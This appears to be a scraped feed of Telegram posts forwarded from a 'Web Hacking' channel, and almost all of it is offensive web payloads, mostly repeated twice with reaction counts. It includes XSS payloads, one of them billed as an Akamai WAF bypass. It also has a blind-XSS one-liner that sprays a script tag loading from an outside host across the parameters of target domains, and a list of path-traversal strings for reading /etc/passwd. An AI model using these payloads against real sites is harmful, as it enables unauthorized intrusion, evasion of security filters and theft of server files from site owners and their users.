Forwarded from Web Hacking
A nice way to store the payload
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
π6
Forwarded from Web Hacking
A payload to bypass Akamai WAF
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
π7
Forwarded from Web Hacking
Another one
"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>
"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>
π3π€2
One Liner To Find Blind XSS
Blind XSS in Parameters
subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
Blind XSS in Parameters
subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
π4
π2
Some filter bypass payload list while hunting for LFi vulnerability
βindex.php?page=....//....//etc/passwd
βindex.php?page=..///////..////..//////etc/passwd
βindex.php?page=/var/www/../../etc/passwd
βindex.php?page=....//....//etc/passwd
βindex.php?page=..///////..////..//////etc/passwd
βindex.php?page=/var/www/../../etc/passwd
π9π1